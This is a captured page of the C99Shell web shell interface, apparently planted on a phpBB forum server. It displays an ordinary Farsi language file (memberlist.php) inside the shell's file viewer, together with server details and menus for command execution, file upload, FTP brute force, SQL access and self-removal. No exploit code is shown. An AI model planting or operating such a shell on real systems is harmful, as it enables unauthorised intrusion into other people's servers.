!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/language/fa/   drwxrwxr-x
Free 83.25 GB of 96.73 GB (86.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     memberlist.php (7.22 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* memberlist [Farsi]
*
* @package language
* @version $Id: memberlist.php,v 1.35 2007/10/04 15:07:24 acydburn Exp $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

/**
* DO NOT CHANGE
*/
if (!defined('IN_PHPBB'))
{
    exit;
}

if (empty(
$lang) || !is_array($lang))
{
    
$lang = array();
}

// DEVELOPERS PLEASE NOTE
//
// All language files should use UTF-8 as their encoding and the files must not contain a BOM.
//
// Placeholders can now contain order information, e.g. instead of
// 'Page %s of %s' you can (and should) write 'Page %1$s of %2$s', this allows
// translators to re-order the output of data while ensuring it remains correct
//
// You do not need this where single placeholders are used, e.g. 'Message %d' is fine
// equally where a string contains only two placeholders which are used to wrap text
// in a url you again do not need to specify an order e.g., 'Click %sHERE%s' is fine

$lang array_merge($lang, array(
    
'ABOUT_USER'            => 'مشخصات',
    
'ACTIVE_IN_FORUM'        => 'بيشترين انجمن کاري',
    
'ACTIVE_IN_TOPIC'        => 'بيشترين تاپيک کاري',
    
'ADD_FOE'                => 'افزودن دشمن',
    
'ADD_FRIEND'            => 'افزودن دوست',
    
'AFTER'                    => 'بعد',

    
'ALL'                    => 'همه',

    
'BEFORE'                => 'پيش',

    
'CC_EMAIL'                => 'يک کپي از اين ايميل براي من بفرست.',
    
'CONTACT_USER'            => 'ارتباط با',

    
'DEST_LANG'                => 'زبان',
    
'DEST_LANG_EXPLAIN'        => 'Select an appropriate language (if available) for the recipient of this message.',

    
'EMAIL_BODY_EXPLAIN'    => 'This message will be sent as plain text, do not include any HTML or BBCode. The return address for this message will be set to your e-mail address.',
    
'EMAIL_DISABLED'        => 'Sorry but all e-mail related functions have been disabled.',
    
'EMAIL_SENT'            => 'ايميل ارسال شد..',
    
'EMAIL_TOPIC_EXPLAIN'    => 'This message will be sent as plain text, do not include any HTML or BBCode. Please note that the topic information is already included in the message. The return address for this message will be set to your e-mail address.',
    
'EMPTY_ADDRESS_EMAIL'    => 'شما بايد آدرس ايميل صحيحي براي گيرنده وارد کنيد.',
    
'EMPTY_MESSAGE_EMAIL'    => 'براي ارسال ايميل لطفا بدنه پيغام را وارد کنيد.',
    
'EMPTY_MESSAGE_IM'        => 'براي ارسال بايد يک پيغام وارد کنيد.',
    
'EMPTY_NAME_EMAIL'        => 'شما بايد يک نام واقعي براي گيرنده وارد کنيد.',
    
'EMPTY_SUBJECT_EMAIL'    => 'شما براي ايميل بايد يک عنوان تعيين کنيد.',
    
'EQUAL_TO'                => 'مساوي با',

    
'FIND_USERNAME_EXPLAIN'    => 'Use this form to search for specific members. You do not need to fill out all fields. To match partial data use * as a wildcard. When entering dates use the format <kbd>YYYY-MM-DD</kbd>, e.g. <samp>2004-02-29</samp>. Use the mark checkboxes to select one or more usernames (several usernames may be accepted depending on the form itself) and click the Select Marked button to return to the previous form.',
    
'FLOOD_EMAIL_LIMIT'        => 'You cannot send another e-mail at this time. Please try again later.',

    
'GROUP_LEADER'            => 'رهبر گروه',

    
'HIDE_MEMBER_SEARCH'    => 'جستجوي کاربر مخفي',

    
'IM_ADD_CONTACT'        => 'افزودن تماس',
    
'IM_AIM'                => 'Please note that you need AOL Instant Messenger installed to use this.',
    
'IM_AIM_EXPRESS'        => 'AIM Express',
    
'IM_DOWNLOAD_APP'        => 'دانلود برنامه',
    
'IM_ICQ'                => 'Please note that users may have selected to not receive unsolicited instant messages.',
    
'IM_JABBER'                => 'Please note that users may have selected to not receive unsolicited instant messages.',
    
'IM_JABBER_SUBJECT'        => 'This is an automated message please do not reply! Message from user %1$s at %2$s.',
    
'IM_MESSAGE'            => 'پيغام شما',
    
'IM_MSNM'                => 'Please note that you need Windows Messenger installed to use this.',
    
'IM_MSNM_BROWSER'        => 'مرورگر شما اين را پشتيباني نمي کند.',
    
'IM_MSNM_CONNECT'        => 'MSNM is not connected.\nYou have to connect to MSNM to continue.',        
    
'IM_NAME'                => 'نام شما',
    
'IM_NO_DATA'            => 'There is no suitable contact information for this user.',
    
'IM_NO_JABBER'            => 'Sorry, direct messaging of Jabber users is not supported on this server. You will need a Jabber client installed on your system to contact the recipient above.',
    
'IM_RECIPIENT'            => 'گيرنده',
    
'IM_SEND'                => 'ارسال پيغام',
    
'IM_SEND_MESSAGE'        => 'ارسال پيغام',
    
'IM_SENT_JABBER'        => 'پيغام شما به %1$s با موفقيت ارسال شد.',
    
'IM_USER'                => 'ارسال يک پيغام فوري',
    
    
'LAST_ACTIVE'                => 'آخرين فعاليت',
    
'LESS_THAN'                    => 'کمتر از',
    
'LIST_USER'                    => '1 کاربر',
    
'LIST_USERS'                => '%d کاربر',
    
'LOGIN_EXPLAIN_LEADERS'        => 'براي مشاهده تيم انجمن شما ابتدا در انجمن ثبت نام کرده و سپس با نام کاربري خود وارد شويد.',
    
'LOGIN_EXPLAIN_MEMBERLIST'    => 'براي دستيابي به اجازه مشاهده ليست کاربران ابتدا بايد درسايت ثبت نام کنيد سپس با نام کاربري خود وارد شويد.',
    
'LOGIN_EXPLAIN_SEARCHUSER'    => 'براي جستجوي کاربران لطفا در انجمن عضو شده و سپس وارد شويد.',
    
'LOGIN_EXPLAIN_VIEWPROFILE'    => 'براي مشاهده مشخصات کاربران ابتدا بايد در سايت ثبت نام کرده و سپس با نام کاربري خود وارد شويد.',

    
'MORE_THAN'                => 'بيشتر از اين',

    
'NO_EMAIL'                => 'شما اجازه ارسال ايميل به اين کاربر را نداريد.',
    
'NO_VIEW_USERS'            => 'شما اجازه ديدن ليست کاربران و مشخصات آنان را نداريد.',

    
'ORDER'                    => 'ترتيب',
    
'OTHER'                    => 'ديگر',

    
'POST_IP'                => 'Posted from IP/domain',

    
'RANK'                    => 'امتياز',
    
'REAL_NAME'                => 'نام گيرنده',
    
'RECIPIENT'                => 'گيرنده',
    
'REMOVE_FOE'            => 'حذف دشمن',
    
'REMOVE_FRIEND'            => 'حذف دوست',

    
'SEARCH_USER_POSTS'        => 'جستجو در پست هاي کاربر',
    
'SELECT_MARKED'            => 'انتخاب علامت دار',
    
'SELECT_SORT_METHOD'    => 'مرتب سازي بر اساس',
    
'SEND_AIM_MESSAGE'        => 'ارسال پيغام AIM',
    
'SEND_ICQ_MESSAGE'        => 'ارسال پيغام ICQ',
    
'SEND_IM'                => 'Instant messaging',
    
'SEND_JABBER_MESSAGE'    => 'ارسال پيغام Jabber',
    
'SEND_MESSAGE'            => 'پيغام',
    
'SEND_MSNM_MESSAGE'        => 'ارسال پيغام MSNM/WLM',
    
'SEND_YIM_MESSAGE'        => 'ارسال پيغام ياهو',
    
'SORT_EMAIL'            => 'ايميل',
    
'SORT_LAST_ACTIVE'        => 'Last active',
    
'SORT_POST_COUNT'        => 'مشاهده پست',

    
'USERNAME_BEGINS_WITH'    => 'نام کاربري شروع شود با',
    
'USER_ADMIN'            => 'کاربر - مديريت سايت',
    
'USER_BAN'                => 'در حال اخراج',
    
'USER_FORUM'            => 'اطلاعات کاربر',
    
'USER_ONLINE'            => 'آنلاين',
    
'USER_PRESENCE'            => 'اطلاعات حضور',

    
'VIEWING_PROFILE'        => 'درحال مشاهده مشخصات  %s',
    
'VISITED'                => 'آخرين بازديد',

    
'WWW'                    => 'وب سايت',
));

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0046 ]--